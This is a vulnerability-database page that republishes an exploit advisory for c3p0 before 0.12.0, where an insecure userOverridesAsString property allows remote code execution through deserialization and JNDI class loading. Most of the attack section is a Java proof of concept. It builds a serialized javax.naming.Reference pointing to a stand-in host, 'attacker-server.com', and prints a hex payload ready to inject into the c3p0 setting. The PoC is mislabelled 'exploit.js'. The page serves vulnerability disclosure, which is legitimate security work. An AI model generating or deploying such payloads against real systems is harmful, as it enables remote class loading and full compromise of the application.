Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 c3p0 Insecure Deserialization

🗓️ 06 Mar 2026 00:00:00Reported by indoushkaType 
packetstorm
 packetstorm🔗 packetstorm.news👁 139 Views

C3p0 before 0.12.0 enables RCE via insecure userOverridesAsString deserialization and JNDI loading.

Code
=============================================================================================================================================
    | # Title     : c3p0 prior to version 0.12.0 via userOverridesAsString Insecure Deserialization and Remote JNDI Class Loading               |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
    | # Vendor    : https://www.mchange.com/projects/c3p0/                                                                                      |
    =============================================================================================================================================
    
    [+] Summary    :  A critical vulnerability in c3p0 prior to version 0.12.0 allows attackers to achieve remote code execution (RCE) through insecure handling of the userOverridesAsString property in several ConnectionPoolDataSource implementations.
    
    Before version 0.12.0, this property was internally stored as a hex-encoded Java-serialized object. If an attacker is able to modify or inject a malicious value into this property — either directly, via crafted serialized objects, or through malicious javax.naming.Reference instances — the application may deserialize untrusted data.
    
    The risk is significantly amplified by legacy behavior in mchange-commons-java, a core dependency of c3p0. Older versions allowed ungated support for remote factoryClassLocation values, enabling remote class loading through embedded JNDI references.
    
    [+] During deserialization:
    
    The hex-encoded string is decoded into a byte array
    
    The object is deserialized
    
    Embedded javax.naming.Reference objects may be dereferenced
    
    Remote classes may be downloaded from attacker-controlled locations
    
    Arbitrary code may execute within the application's CLASSPATH
    
    This creates a full Remote Code Execution condition if the attacker can influence configuration properties or serialized inputs.
    
    [+] Impact
    
    Remote Code Execution (RCE)
    
    Arbitrary class loading from remote servers
    
    Full compromise of application runtime
    
    Potential lateral movement within enterprise environments
    				  
    [+] POC   :  exploit.js 
    
    import java.io.*;
    import javax.naming.Reference;
    import java.util.Map;
    import java.util.HashMap;
    
    public class C3P0ExploitPayload {
    
        public static void main(String[] args) {
            try {
                // 1. Setup malicious server details
                String attackerUrl = "http://attacker-server.com/";
                String className = "ExploitObject";
                Reference ref = new Reference(className, className, attackerUrl);
                byte[] serializedObject = serialize(ref);
    
                String hexPayload = bytesToHex(serializedObject);
                System.out.println("--- Payload Ready for Injection ---");
                System.out.println("Property: c3p0.userOverridesAsString");
                System.out.println("Value: " + hexPayload);
                System.out.println("\n--- Note ---");
                System.out.println("When this value is placed in c3p0 settings, the application will decode the Hex");
                System.out.println("and deserialize the object, triggering a JNDI Remote Class Loading attack.");
    
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
    
        private static byte[] serialize(Object obj) throws IOException {
            ByteArrayOutputStream baos = new ByteArrayOutputStream();
            ObjectOutputStream oos = new ObjectOutputStream(baos);
            oos.writeObject(obj);
            oos.close();
            return baos.toByteArray();
        }
        private static String bytesToHex(byte[] bytes) {
            StringBuilder sb = new StringBuilder();
            for (byte b : bytes) {
                sb.append(String.format("%02x", b));
            }
            return sb.toString().toUpperCase();
        }
    }
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Mar 2026 00:00Current
6.3Medium risk
Vulners AI Score6.3
c3p0insecure deserializationremote code executionjndi loadinguserOverridesAsStringversion before 0.12.0
139